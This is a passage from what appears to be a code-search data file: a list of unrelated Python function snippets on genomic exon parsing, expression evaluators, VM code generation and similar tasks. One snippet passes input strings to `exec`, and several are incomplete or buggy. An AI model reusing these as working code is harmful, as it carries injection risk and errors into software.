list(self._clusterInfo['map'][r]).index(rom)\n # find ROM in full history\n segmentIndex = self._getSegmentIndexFromClusterIndex(r, self._clusterInfo['labels'], clusterIndex=clusterIndex)\n # make local modifications based on global settings\n delim = self._divisionInfo['delimiters'][r]\n picker = slice(delim[0], delim[-1] + 1)\n result = rom.finalizeLocalRomSegmentEvaluation(self._romGlobalAdjustments, result, picker)\n # make global modifications based on global settings\n result = self._templateROM.finalizeGlobalRomSegmentEvaluation(self._romGlobalAdjustments, result, weights=weights)\n return result", "def process_expr(expr, get, key, val):\n for node in ast.walk(ast.parse(expr.strip(), mode='eval')):\n name = get(node)\n if name not in symbols:\n result.append((name, key, val))", "def exon_finder(tstart,tend,strand,qstart,qend,qlen,qstartphase,qendphase,seqdict,seqname,\n max_offset = 30, is_start = False, is_stop = False, nevermind_atg = False,\n cluster = None,exon_number = None,log_file = open(os.devnull, 'w'),full_pseudoexon_search = True,\n exon_info_dict = False):\n start = None\n end = None\n pseudo = False\n 
max_coord = len(seqdict[seqname]) - 1\n if strand == \"+\":\n phasestart_offset = (3 - qstartphase) % 3\n phasestop_offset = qendphase\n start_match_offset, stop_match_offset = 3 * (qstart - 1),3 * (qlen - qend)\n elif strand == '-':\n phasestart_offset = qendphase\n phasestop_offset = (3 - qstartphase) % 3\n start_match_offset, stop_match_offset = 3 * (qlen - qend), 3 * qstart\n ideal_start = tstart - phasestart_offset - start_match_offset\n ideal_end = tend + stop_match_offset + phasestop_offset\n pseudo_start = tstart - phasestart_offset\n pseudo_end = tend + phasestop_offset\n gc_start, gc_end = None, None\n for offset in range(0,max_offset + 3,3):\n if start:\n break\n for direction in [1,-1]:\n test_start = ideal_start - offset * direction\n test_seq = genome.Sequence(seqdict[seqname][test_start-1 + phasestart_offset:tend])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"-\":\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n lastcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if lastcodon.upper() in ['TTA','TCA','CTA'] and test_seq.translate().count('*') == 1:\n start = test_start\n break\n elif not \"*\" in test_seq.translate():\n if ideal_start - 1 < test_start < pseudo_start:\n pseudo_start = test_start\n if is_start and strand == '+':\n if nevermind_atg:\n start = test_start\n break\n else:\n firstcodon = seqdict[seqname][test_start - 1:test_start + 2]\n if firstcodon.upper() == \"ATG\":\n start = test_start\n break\n else:\n splicesite = seqdict[seqname][test_start-3:test_start-1]\n if (strand == '+' and splicesite.upper() == \"AG\") or (strand == '-' and splicesite.upper() == \"AC\"):\n start = test_start\n break\n elif strand == '-' and splicesite.upper() == \"GC\" and not gc_start:\n gc_start = test_start\n if not start:\n if gc_start:\n start = gc_start\n else:\n pseudo = \"P\"\n start = pseudo_start\n for offset in range(0,max_offset + 3,3):\n if end:\n break\n for direction in [-1,1]:\n test_end = ideal_end - offset * direction\n if test_end - start < 3:\n break\n test_seq = genome.Sequence(seqdict[seqname][start - 1 + phasestart_offset:test_end - phasestop_offset])\n if strand == \"-\":\n test_seq = test_seq.reverse_compliment()\n if not test_seq.translate():\n continue\n elif is_stop and strand == \"+\":\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n lastcodon = seqdict[seqname][test_end - 3:test_end]\n if lastcodon.upper() in ['TAA','TGA','TAG'] and test_seq.translate().count('*') == 1:\n end = test_end\n break\n elif not \"*\" in test_seq.translate() or (is_stop and not \"*\" in test_seq.translate()[:-1]):\n if ideal_end + 1 > test_end > pseudo_end:\n pseudo_end = test_end\n if is_start and strand == '-':\n if nevermind_atg:\n end = test_end\n break\n else:\n firstcodon = seqdict[seqname][test_end - 3:test_end]\n if firstcodon.upper() == \"CAT\":\n end = test_end\n break\n else:\n splicesite = seqdict[seqname][test_end:test_end + 2]\n if (strand == '+' and splicesite.upper() == \"GT\") or (strand == '-' and splicesite.upper() == \"CT\"):\n end = test_end\n break\n elif strand == \"+\" and splicesite.upper() == \"GC\" and not gc_end:\n gc_end = test_end\n if not end:\n if gc_end:\n end = gc_end\n else:\n pseudo = \"P\"\n end = pseudo_end\n start = max([1,start])\n end = min([end,max_coord])\n if pseudo and full_pseudoexon_search and cluster != None and exon_number != None and exon_info_dict:\n gwexons = 
genewisesearch(seqdict[seqname],qstartphase,qendphase,strand,\n exon_info_dict[str(cluster) + ':' + str(exon_number)][6], \n search_coords = [ideal_start - 3 - max_offset,ideal_end + 3 + max_offset],\n seqname = seqname,log_file=log_file)\n if gwexons != []:\n return gwexons\n return [[start,end,pseudo]]", "def parse_expression_into_parts(expression):\n raise NotImplementedError(\"complete me!\")", "def parse_ensembl_exons(lines):\n header = []\n for index, line in enumerate(lines):\n # File allways start with a header line\n if index == 0:\n header = line.rstrip().split(\"\\t\")\n continue\n\n exon_info = parse_ensembl_line(line, header)\n\n exon = {\n \"chrom\": str(exon_info[\"chrom\"]),\n \"gene\": exon_info[\"ensembl_gene_id\"],\n \"transcript\": exon_info[\"ensembl_transcript_id\"],\n \"ens_exon_id\": exon_info[\"ensembl_exon_id\"],\n \"exon_chrom_start\": exon_info[\"exon_start\"],\n \"exon_chrom_end\": exon_info[\"exon_end\"],\n \"strand\": exon_info[\"strand\"],\n \"rank\": exon_info[\"exon_rank\"],\n }\n try:\n exon[\"5_utr_start\"] = int(exon_info.get(\"utr_5_start\"))\n except (ValueError, TypeError):\n exon[\"5_utr_start\"] = None\n\n try:\n exon[\"5_utr_end\"] = int(exon_info.get(\"utr_5_end\"))\n except (ValueError, TypeError):\n exon[\"5_utr_end\"] = None\n\n try:\n exon[\"3_utr_start\"] = int(exon_info.get(\"utr_3_start\"))\n except (ValueError, TypeError):\n exon[\"3_utr_start\"] = None\n\n try:\n exon[\"3_utr_end\"] = int(exon_info.get(\"utr_3_end\"))\n except (ValueError, TypeError):\n exon[\"3_utr_end\"] = None\n\n # Recalculate start and stop (taking UTR regions into account for end exons)\n if exon[\"strand\"] == 1:\n # highest position: start of exon or end of 5' UTR\n # If no 5' UTR make sure exon_start is allways choosen\n start = max(exon[\"exon_chrom_start\"], exon[\"5_utr_end\"] or -1)\n # lowest position: end of exon or start of 3' UTR\n end = min(exon[\"exon_chrom_end\"], exon[\"3_utr_start\"] or float(\"inf\"))\n elif exon[\"strand\"] == -1:\n # highest position: start of exon or end of 3' UTR\n start = max(exon[\"exon_chrom_start\"], exon[\"3_utr_end\"] or -1)\n # lowest position: end of exon or start of 5' UTR\n end = min(exon[\"exon_chrom_end\"], exon[\"5_utr_start\"] or float(\"inf\"))\n\n exon[\"start\"] = start\n exon[\"end\"] = end\n exon_id = \"-\".join([str(exon[\"chrom\"]), str(start), str(end)])\n exon[\"exon_id\"] = exon_id\n\n if start > end:\n raise ValueError(\"ERROR: %s\" % exon_id)\n\n yield exon", "def _get_address_calculation(segment, index, file_name):\n\n if segment == \"constant\": # Temp starts at 5\n load_bytecode = [f\"@{index}\", \"D=A\"]\n\n elif segment == \"temp\":\n load_bytecode = [f\"@{int(index) + 5}\", \"D=A\"]\n\n elif segment == \"static\":\n variable_name = file_name + \".\" + index\n load_bytecode = [f\"@{variable_name}\", \"D=A\"]\n\n elif segment == \"pointer\":\n if index == \"0\":\n register = \"THIS\"\n else:\n register = \"THAT\"\n\n load_bytecode = [f\"@{register}\", \"D=A\"]\n\n else:\n load_bytecode = [f\"@{VirtualMachineLibrary._get_symbolic_symbol(segment)}\", \"D=M\", f\"@{index}\", \"D=D+A\"]\n\n full_address_bytecode = load_bytecode + [\"@R13\", \"M=D\"]\n return full_address_bytecode", "def exonString(genes, startref, endref):\n\tstring = (endref-startref+1)*'N'\n\tfor gene in genes:\n\t\tfor exon in genes[gene].coords:\n\t\t\tstart = exon[0] - startref\n\t\t\tend = exon[1] - startref\n\t\t\texonlength = end - start + 1\n\t\t\texonstring = (exonlength)*'F'\n\t\t\tstring = replaceString(string, exonstring, 
start)\n\t\t\t\n\treturn string", "def expression(self) -> Optional[str]:\n return pulumi.get(self, \"expression\")", "def get_econs(self):\n eham = self.beads.vpath*self.nm.omegan2 + self.nm.kin + self.forces.pot\n eham += self.bias.pot # bias\n for e in self._elist:\n eham += e.get()\n\n return eham + self.eens", "def main(expression):\n\n exception = parse_expression(expression)\n return calc(poland_notation(exception))", "def _process_egocentric(self, signal: egocentric.EgocentricSignal):\n output_signals = []\n output_signals += self._process_egocentric_direction(\n self._get_hparam('egocentric_direction_mode'),\n signal.xz_direction,\n signal.yz_direction)\n output_signals += self._process_egocentric_distance(\n self._get_hparam('egocentric_distance_mode'),\n signal.distance)\n return output_signals", "def getCurveSegment(self, *args):\n return _libsbml.Curve_getCurveSegment(self, *args)", "def get_total_gene_expr(gene, countinfo, Idx, seg_expr, cross_graph_expr):\n if len(seg_expr.shape) == 1:\n n_samples = 1\n else:\n n_samples = seg_expr.shape[1]\n\n if countinfo is None or Idx.sample is None:\n return [np.nan] * n_samples\n seg_len = gene.segmentgraph.segments[1] - gene.segmentgraph.segments[0]\n\n if cross_graph_expr:\n total_expr = np.sum(seg_len * seg_expr.T, axis=1)\n total_expr = total_expr.tolist()\n else:\n total_expr = [np.sum(seg_len*seg_expr)]\n return total_expr", "def create_expression(ex_names, stat_types):\n expression = ''\n if not isinstance(ex_names, list):\n ex_names = list(ex_names)\n\n if not isinstance(stat_types, list):\n stat_types = list(stat_types)\n\n expression = expression_maker(ex_names, stat_types.pop(0))\n for stat_type in stat_types:\n expression = expression + ',' + expression_maker(ex_names, stat_types)", "def getIntrons(self):\n rtrn = []\n for i in range(0,len(self.exonStarts)-1):\n rtrn.append(Interval(self.chr,self.exonEnds[i]+1,self.exonStarts[i+1]-1))\n return rtrn", "def get_expressions( useful_genes, expr_file):\n\n\t#open expressions file\n\texpression_stream = gzip.open(expr_file, \"r\")\n \n\t#reset line number\n\tlinenum = 0\n\n\texpressions_dict = {}\n\n\texpressions_header = [] \n\n\t#initialize progress bar\n\tfor line in expression_stream:\n\n\t\tlinenum += 1\n \n\t\t#skip first line, as those are the labels\n\n\n\t\tif isinstance(line, bytes) and not isinstance(line, str):\n\n\t\t\t\t\tline = line.decode()\n\t\tif line[0] != \"#\":\n\n\t\t\t#parse line\n\t\t\tline_content = line.rstrip().split(\",\")\n\t\t\t#if variant pos and gene match some value\n\t\t\tif line_content[0].split(\".\")[0] in useful_genes :\n\n\t\t\t\t#save the expression data for all the samples\n\n\t\t\t\tvar_expr = line_content[1:]\n\t\t\t\texpressions_dict[line_content[0].split(\".\")[0]] = var_expr\n\t\t\t\t#processed another variant\n\n\n\n\n\t\t\telif line.split(',')[0] == 'Name':\n \n\t\t\t\t#this is our header\n\t\t\t\texpressions_header = line.replace(\"\\n\",\"\").split(',')\n\n\treturn [expressions_dict, expressions_header]", "def calcSegmentCoordinates(self, segment):\n # Write the cpptraj infile\n segment_name_string = segment.getNameString()\n \n coordinates = self.calcCoordinatesOfFile(\"{jn}-run/{namestring}.rst7\".format(jn=self.jobname, \n namestring = segment_name_string))\n # set coordinates in segment\n segment.setCoordinates(coordinates)\n return coordinates", "def update_exon_info(ensembl_info, word, value):\n if \"exon\" in word:\n if \"start\" in word:\n ensembl_info[\"exon_start\"] = int(value)\n elif \"end\" in word:\n 
ensembl_info[\"exon_end\"] = int(value)\n elif \"id\" in word:\n ensembl_info[\"ensembl_exon_id\"] = value\n elif \"rank\" in word:\n ensembl_info[\"exon_rank\"] = int(value)\n return ensembl_info", "def get_expr(self, expr): # secured\n expr = utils.condition_source_code_keys(expr, self.get_required_parkeys())\n try:\n return expr, MAPPING_VERIFIER.compile_and_check(expr, source=self.basename, mode=\"eval\")\n except crexc.MappingFormatError as exc:\n raise crexc.MappingFormatError(\"Can't load file \" + repr(self.basename) + \" : \" + str(exc)) from exc", "def exeval(expression): \n if len(expression) <= 3: #Assuming no spaces (\" \") between each value given in the expression\n if expression[0] == \"+\":\n return float(expression[1]) + float(expression[2])\n elif expression[0] == \"-\":\n return float(expression[1]) - float(expression[2])\n else:\n if expression[0] == \"+\":\n return float(expression[1]) + exeval(expression[2:])\n elif expression[0] == \"-\":\n return float(expression[1]) - exeval(expression[2:])", "def __str__(self) -> str:\n return \"'{tag}' EDI segment: {elements}\".format(\n tag=self.tag, elements=str(self.elements)\n )", "def expr(self, approxmeth):\n if approxmeth == 'piecewise_poly':\n # see approx_x_piecewise_poly_template.c\n c = [sympy.Symbol('c_' + str(o), real = True) for \\\n o in range(self.order + 1)]\n localy = sympy.Symbol('localy')\n\n return (\n sum([c[o]*localy**o for o in range(self.order + 1)]),\n (DummyGroup('coeffdummy', c),),\n (ArrayifyGroup('coeffdummy', 'lookup_x', 'tbl_offset'),)\n )\n else:\n raise ValueError(\"Unkown approxmeth={}\".format(approxmeth))", "def expression(self):\n return self._expression", "def __call__(self):\n return rstr.xeger(self._xeger)", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def expression(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"expression\")", "def _get_regex(self, ctx):\n _parts = []\n\n with ctx.processing(self):\n for _child in self.children:\n _parts.append(self._as_regex_obj(_child)._get_regex(ctx))\n return \"\".join(_parts)", "def _getvalue_expr_Ellipsis(self, expr: ast.Ellipsis) -> Any:\n return Ellipsis", "def onExpressionBlock(self, match):\n\t\tlines=self.process(match[1])\n\t\tres=[]\n\t\tfor _ in lines:\n\t\t\tres = (res + _[2])\n\t\treturn res", "def get_expr(self, expr, locals={}):\n _locals = {}\n if locals is not None:\n _locals = dict(self._locals, **locals)\n\n expr = expr.strip() # extraneous spaces otherwise interpreted as indentation\n\n self._request_all_objects_in_expression(expr)\n\n _result = self._eval(node=ast.parse(expr, mode='eval').body,\n ctx=dict(operators=self.operators,\n functions=self.functions,\n locals=_locals,\n input=True))\n\n # raise exceptions unable to be raised during `_eval` for technical reasons\n # (e.g. due to expressions with self-referencing local variables that would\n # cause infinite recursion)\n if isinstance(_result, Exception):\n raise _result\n\n return _result", "def test_get_extax_tostring_correct(self):\n got_var, const_jtar = rapid_datatypes.get_rapid_data(self.controller, 'T_ROB1', 'MainModule', 'const_jtarget')\n if not got_var:\n print 'Couldn\\'t get variable. 
Test will not run.'\n sys.exit()\n extax = rapid_jointtarget.get_extax_tostring(const_jtar)\n self.assertEqual(extax, 'Extax: [Eax_a,Eax_b,Eax_c,Eax_d,Eax_e,Eax_f] = [9E9,9E9,9E9,9E9,9E9,9E9]')", "def get_expression(data_series, probes_to_genes):\n with open(data_series, 'r') as mtx:\n stage_columns = {'all_stages': {'sample_ids': []}} # will always need an average, other stages are determined by the file\n sample_ids = None\n for line in mtx:\n if line.startswith('!Sample_title'):\n sample_stages = [x.strip().replace('\"','').split(\",\")[0] for x in line.split(\"\\t\")[1:]] # this line is likely dataset specific.\n elif line.startswith('\"ID_REF\"'): # this comes after the sample titles\n sample_ids = [x.strip().replace('\"','') for x in line.split(\"\\t\")[1:]]\n # now have the ids and their stages, convert to dict\n \"\"\"\n if named differently, may need to modify this.\n ultimately, stage_columns should be a dictionary with the following properties:\n - the keys are the stage names. \n - each 'stage' dict should have a key 'sample_ids' that has a list the sample_ids belonging to that stage.\n {\n 'stage1': {\n 'sample_ids': ['sample_id1','sample_id2', ..., 'sample_idn']\n },\n 'stage2': {\n 'sample_ids': ['sample_idn+1', ...]\n },\n ...\n }\n \"\"\"\n for i in range(0, len(sample_stages)):\n if sample_stages[i] not in stage_columns:\n stage_columns[sample_stages[i]] = {'sample_ids': []}\n stage_columns[sample_stages[i]]['sample_ids'].append(sample_ids[i])\n stage_columns['all_stages']['sample_ids'].append(sample_ids[i]) # add every sample to this\n elif sample_ids is not None:\n row = [x.strip().replace('\"','') for x in line.split('\\t')]\n \"\"\"\n here, the stage_columns dictionary is being updated with the expression data for each gene.\n {\n 'stage1': {\n 'sample_ids': ['sample_id1','sample_id2', ..., 'sample_idn'],\n 'genes': { <- **NEW KEY**\n 'entrezID-1': ['sample_id1ExpLevel', 'sample_id2ExpLevel', ..., 'sample_idnExpLevel'],\n 'entrezID-2': ['sample_id1ExpLevel', 'sample_id2ExpLevel', ..., 'sample_idnExpLevel'],\n ... 
(if PERCENTILE_RANK is True, all in dataset are recorded otherwise, just the genes of interest )\n }\n },\n ...\n }\n \"\"\"\n if row[0] in probes_to_genes:\n # get gene from probe\n entrez_id = probes_to_genes[row[0]]\n # add the average expression for all the samples in a stage for the gene\n for stage, stage_data in stage_columns.items():\n stage_data['genes'] = {} if 'genes' not in stage_data else stage_data['genes'] # initialize\n for sample_id in stage_data['sample_ids']:\n # get the index of the sample_id in the row\n sample_idx = sample_ids.index(sample_id) + 1\n if entrez_id not in stage_data['genes']:\n stage_data['genes'][entrez_id] = [float(row[sample_idx])]\n else:\n stage_data['genes'][entrez_id].append(float(row[sample_idx]))\n\n return stage_columns", "def expression(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"expression\")", "def report_exon_overlap(strand1, exons1, strand2, exons2):\n #print(strand1)\n #print(exons1)\n #print(exons2)\n exons1 = convert_2dlst_to_set(exons1)\n first_exon1, last_exon1 = return_first_and_last_exon(exons1)\n exons2 = convert_2dlst_to_set(exons2)\n first_exon2, last_exon2 = return_first_and_last_exon(exons2)\n \n dct_report = dict()\n if not first_exon1 == first_exon2:\n \"\"\" first exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(first_exon1).split(\".\")[1] == str(first_exon2).split(\".\")[1]:\n \"\"\" if first intron-start boundary is the same \"\"\"\n if int(str(first_exon1).split(\".\")[0]) > int(str(first_exon2).split(\".\")[0]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_inside\"\n else:\n dct_report[3] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[5] = \"partial_outside\"\n else:\n dct_report[3] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"different\"\n else:\n dct_report[3] = \"different\"\n else:\n if strand1 == \"+\":\n dct_report[5] = \"same\"\n else:\n dct_report[3] = \"same\"\n\n if not last_exon1 == last_exon2:\n \"\"\" last exon of isoseq and annotated-gene-model are not exactly the same \"\"\"\n if str(last_exon1).split(\".\")[0] == str(last_exon2).split(\".\")[0]:\n \"\"\" if last intron-end boundary is the same \"\"\"\n if int(str(last_exon1).split(\".\")[1]) < int(str(last_exon2).split(\".\")[1]):\n \"\"\" if isoseq first exon is shorter \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_inside\"\n else:\n dct_report[5] = \"partial_inside\"\n else:\n \"\"\" if isoseq first exon is longer \"\"\"\n if strand1 == \"+\":\n dct_report[3] = \"partial_outside\"\n else:\n dct_report[5] = \"partial_outside\"\n else:\n if strand1 == \"+\":\n dct_report[3] = \"different\"\n else:\n dct_report[5] = \"different\" \n else:\n if strand1 == \"+\":\n dct_report[3] = \"same\"\n else:\n dct_report[5] = \"same\"\n return(dct_report[5], dct_report[3])", "def calculate_infix_expression(cls, expression):\n\t\tlogger.info(f\"in the calculate infix expression {expression}\")\n\t\telements = expression.split()\n\t\tstack = []\n\t\ttry:\n\t\t\tfor e in elements:\n\t\t\t\tif not e.isdigit() and e != \")\":\n\t\t\t\t\tstack.append(e)\n\t\t\t\tif e.isdigit() and not cls.is_operator(stack[-1]):\n\t\t\t\t\tstack.append(e)\n\t\t\t\tif e.isdigit() and cls.is_operator(stack[-1]):\n\t\t\t\t\toperator = stack.pop()\n\t\t\t\t\toperand1 = stack.pop()\n\t\t\t\t\tresult = cls.apply_math_operations(float(operand1), float(e), operator)\n\t\t\t\t\tif stack[-1] 
== \"(\":\n\t\t\t\t\t\tstack.append(str(result))\n\t\t\t\t\telse:\n\t\t\t\t\t\traise Exception(\"invalid input\")\n\t\t\t\t\t\tbreak\n\t\t\t\tif e == \")\":\n\t\t\t\t\tvalue = stack.pop()\n\t\t\t\t\tob = stack.pop()\n\t\t\t\t\tif (ob == \"(\"):\n\t\t\t\t\t\tstack.append(str(value))\n\t\t\t\t\telif (cls.is_operator(ob)):\n\t\t\t\t\t\toperand1 = stack.pop()\n\t\t\t\t\t\tstack.pop()\n\t\t\t\t\t\tresult = cls.apply_math_operations(float(operand1), float(value), ob)\n\t\t\t\t\t\tstack.append(str(result))\n\n\t\t\tanswer = float(stack[0])\n\t\t\tlogger.info(f\"the answe is {answer}\")\n\t\t\treturn answer\n\t\texcept Exception as e:\n\t\t\traise Exception(\"Exception from the infix function\")", "def parse( self, exprlist ):\n t = self.prop[\"DSEC\"]\n E = self.prop[\"ELE\"]\n V = self.prop[\"VOL\"]\n T = self.prop[\"TEMP\"]\n C = self.prop[\"CONC\"]\n S = self.prop[\"SPEC\"]\n pH = E\n row = []\n for i in exprlist:\n i = i.replace(\"A\", \"self.absorbance\")\n exec 'row.append(' + i + ')'\n return row", "def get_quote_for_sequence_segment(\n self, sequence, segment, max_lead_time=None, **kwargs\n ):\n fragment_to_order = self.assembly_method.compute_fragment_for_sequence_segment(\n sequence=sequence, segment=segment, **kwargs\n )\n return self.supplier.get_quote(fragment_to_order, max_lead_time=max_lead_time)", "def relationalExpr( ):#MAKE SURE I USED THE RIGHT LOGIC FOR THIS\n\n\ttok = tokens.peek( )\n\tif debug: print(\"relationalExpr: \", tok)\n\tleft = addExpr( )\n\texpr = \"\"\n\ttok = tokens.peek( )\n\tif tok in relations:\n\t\trel = relation( ) # expecting a relation to start off \n\t\tright = expression( ) # if there is a relation we expect there to be an expression to the right of the relation\n\t\texpr = BinaryExpr( rel, left, right )\n\t\treturn expr #fix this for syntax tree maybe\n\n\treturn left", "def compile_expr(self, e, prec=0):\n etyp = type(e)\n\n if etyp is HIR.Const:\n if e.typ == f32:\n return (f\"{e.v}f\",[])\n elif e.typ == f64:\n return (f\"Expr({e.v})\",[])\n else:\n return (str(e.v),[])\n elif etyp is HIR.Evar:\n return (self._ctxt[e.v.name],[])\n elif etyp is HIR.Erdom:\n return (self._ctxt[e.r.name],[])\n elif etyp is HIR.Eparam:\n return (self._ctxt[e.p.name],[])\n elif etyp is HIR.BinOp:\n op_prec = HIR_CPP_String._prec[e.op]\n lhs, ls = self.compile_expr(e.lhs, prec=op_prec)\n rhs, rs = self.compile_expr(e.rhs, prec=op_prec+1)\n op = e.op\n if op == \"and\":\n op = \"&&\"\n elif op == \"or\":\n op = \"||\"\n exp = f'{lhs} {e.op} {rhs}'\n if prec > op_prec:\n exp = f'({exp})'\n return (exp,ls+rs)\n elif etyp is HIR.Min or etyp is HIR.Max:\n op = \"min\" if etyp is HIR.Min else \"max\"\n lhs, ls = self.compile_expr(e.lhs)\n rhs, rs = self.compile_expr(e.rhs)\n return (f\"{op}({lhs}, {rhs})\",ls+rs)\n elif etyp is HIR.MathFn1:\n arg, ss = self.compile_expr(e.arg)\n return (f'{e.name}({arg})',ss)\n elif etyp is HIR.Clamp:\n val, vs = self.compile_expr(e.val)\n lo, ls = self.compile_expr(e.lo)\n hi, hs = self.compile_expr(e.hi)\n return (f'clamp({val}, {lo}, {hi})',vs+ls+hs)\n elif etyp is HIR.Pow:\n base,bs = self.compile_expr(e.base)\n exp, es = self.compile_expr(e.exp)\n return (f'pow({base}, {exp})',bs+es)\n elif etyp is HIR.ATan2:\n y, ys = self.compile_expr(e.y)\n x, xs = self.compile_expr(e.x)\n return (f'atan2({y}, {x})',ys+xs)\n elif etyp is HIR.Select:\n pred,ps = self.compile_expr(e.pred)\n lhs, ls = self.compile_expr(e.lhs)\n rhs, rs = self.compile_expr(e.rhs)\n return (f'select({pred}, {lhs}, {rhs})',ps+ls+rs)\n elif etyp is HIR.FAccess:\n nm = e.f.name 
if type(e.f) is HIR.Func else e.f.img.name\n name = self._ctxt[nm]\n tmp = [ self.compile_expr(a) for a in e.args ]\n args = [ a[0] for a in tmp ]\n ss = [ x for a in tmp for x in a[1] ] # flatten list of lists\n return (f'{name}({\",\".join(args)})',ss)\n elif etyp is HIR.BigSum:\n stmts = []\n # RDom variable\n r = self._ctxt[e.r.name]\n\n # handle compiling the body with reduction variable substitution\n # name collisions must be handled out-of-scope\n pure_r = self.new_name(e.r.name.copy())\n self.push_scope(tab=False)\n stmts += [f\"Var {pure_r};\"]\n # but we need to hide the fact that we're re-binding the rdom\n self._ctxt[e.r.name] = pure_r\n self._curr_args = self._curr_args + [pure_r]\n args_x = ','.join(self._curr_args)\n # call body\n body,bs = self.compile_expr(e.body)\n # cleanup\n stmts += bs\n self._curr_args = self._curr_args[:-1]\n self.pop_scope(tab=False)\n\n # create an earlier temp. func corresponding to the sum values\n f0name = self.new_name(Sym(f\"sum{self._sum_count}\"))\n self._sum_count +=1\n f1name = self.new_name(Sym(f\"sum{self._sum_count}\"))\n self._sum_count +=1\n args = ','.join(self._curr_args)\n args_r = ','.join(self._curr_args+[ self._ctxt[e.r.name] ])\n stmts += [f'Func {f0name}(\"{f0name}\");',\n f'Func {f1name}(\"{f1name}\");',\n f\"{f0name}({args_x}) = {body};\",\n f\"{f1name}({args}) = Expr(0.0);\",\n f\"{f1name}({args}) += {f0name}({args_r});\"]\n return (f\"{f1name}({args})\",stmts)\n else: assert False, \"bad case\"", "def get_text(cls, quad):\n\t\ttext = ast.literal_eval(str(cls.get_address_value(quad.result)))\n\t\tx = cls.get_address_value(quad.left_operand)\n\t\ty = cls.get_address_value(quad.right_operand)\n\t\treturn [x, y, text]", "def sel2ea(*args):\n return _ida_segment.sel2ea(*args)", "def get_Ecc_n(self, eccType=\"ed\", r_power=2, order=2, where=\"\", orderBy=\"event_id\"):\n eccArray = self.getEccentricities(eccType=eccType, r_power=r_power, order=order, orderBy=orderBy)\n return eccArray[:,0] + 1j*eccArray[:,1]", "def get_exons_from_transcript(transcript_id):\n assert transcript_id in data.transcript_exons_dict, (\n \"Unknown transcript %s in a dict of size %s, \"\n \"with initial elements %s\") % (\n transcript_id,\n len(data.transcript_exons_dict),\n data.transcript_exons_dict.items()[:5])\n exons = data.transcript_exons_dict[transcript_id]\n assert len(exons) > 0, \\\n \"Couldn't find exons for transcript %s\" % transcript_id\n fields = [\n 'exon_id',\n 'seq_start',\n 'start_exon_id',\n 'seq_end',\n 'end_exon_id',\n 'stable_id_exon',\n 'seq_region_start_exon',\n 'seq_region_end_exon'\n ]\n return exons[fields]", "def get_substr(self, y, x1, x2):\n return self.lines[y][x1 : x2]", "def process_exon_line(self, line):\n kwargs = self.extract_exon_args(line)\n if not kwargs:\n return\n parent_id = kwargs['parent_id']\n if parent_id not in self.mrnas:\n self.orphans.append(line)\n return\n parent_mrna = self.mrnas[parent_id]\n if parent_mrna.exon:\n self.update_exon(line, parent_mrna.exon)\n else:\n parent_mrna.exon = Exon(**kwargs)", "def _read_expression_direct(cls):\n\n expression_data = {}\n expression_columns = cls._get_columns(EXPRESSION_MANIFEST)\n expression_psvs = cls._get_component_psvs(EXPRESSION_MANIFEST)\n\n for expression_psv in expression_psvs:\n for row in gzip.GzipFile(fileobj=io.BytesIO(cls._read_s3_url(expression_psv))):\n row_dict = dict(zip(expression_columns, row.strip().split(b'|')))\n expression_data.setdefault(\n row_dict[\"cellkey\"].decode(), {})[row_dict[\"featurekey\"].decode()] = \\\n 
float(row_dict[\"exrpvalue\"])\n\n return expression_data", "def lf_abnl_interp_negexsp_seizure(report):\n\n for topkey in CANDIDATE_INTERPS_LOWER:\n if topkey in report.sections.keys():\n interpretation = report.sections[topkey]\n if isinstance(interpretation, dict):\n interp_text = interpretation['text']\n else:\n interp_text = interpretation\n \n return eval_interp_with_negex(interp_text)\n\n return ABSTAIN_VAL # if can't find an interpretation then abstain", "def stuff_G(self, row_start, row_end, col_start, col_end, expr, row_stride = None):\n yield \"\"", "def Segments():\n for n in range(ida_segment.get_segm_qty()):\n seg = ida_segment.getnseg(n)\n if seg:\n yield seg.start_ea", "def return_first_and_last_exon(exons):\n lst_exons = list(exons)\n lst_exons.sort(key=int)\n return(lst_exons[0], lst_exons[-1])", "def _build_proj_equation(free_dims, bound_dims, output_dims):\n input_str = \"\"\n kernel_str = \"\"\n output_str = \"\"\n bias_axes = \"\"\n letter_offset = 0\n for i in range(free_dims):\n char = _CHR_IDX[i + letter_offset]\n input_str += char\n output_str += char\n\n letter_offset += free_dims\n for i in range(bound_dims):\n char = _CHR_IDX[i + letter_offset]\n input_str += char\n kernel_str += char\n\n letter_offset += bound_dims\n for i in range(output_dims):\n char = _CHR_IDX[i + letter_offset]\n kernel_str += char\n output_str += char\n bias_axes += char\n equation = \"%s,%s->%s\" % (input_str, kernel_str, output_str)\n\n return equation, bias_axes, len(output_str)", "def _extrapolate(self):\n maxrho = self.maxrho\n x = np.linspace(1.001, maxrho, int(self.nrho/5))\n rho1 = self.rho # rho up to 1\n dec_l = 0.01\n ni_ov = np.zeros((self.nion, len(x)), dtype=float)\n ninew = np.zeros((self.nion, self.nrho+len(x)),dtype=float)\n ne_ov1 = self.ne[self.nrho-1]*np.exp(-((x-1.)/dec_l))\n te_ov1 = self.te[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n ti_ov1 = self.ti[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n vt_ov1 = self.vt[self.nrho-1]*np.exp(-(x-1.)/dec_l)\n for i in range(self.nion):\n ni_ov[i,:] = self.ni[i,self.nrho-1]*np.exp(-(x-1.)/dec_l)\n ninew[i,:] = np.concatenate([self.ni[i,:], ni_ov[i,:]])\n self.ni = ninew\n self.rho = np.concatenate([rho1, x])\n self.nrho = len(rho1)+len(x)\n self.ne = np.concatenate([self.ne, ne_ov1])\n self.te = np.concatenate([self.te, te_ov1])\n self.ti = np.concatenate([self.ti, ti_ov1])\n self.vt = 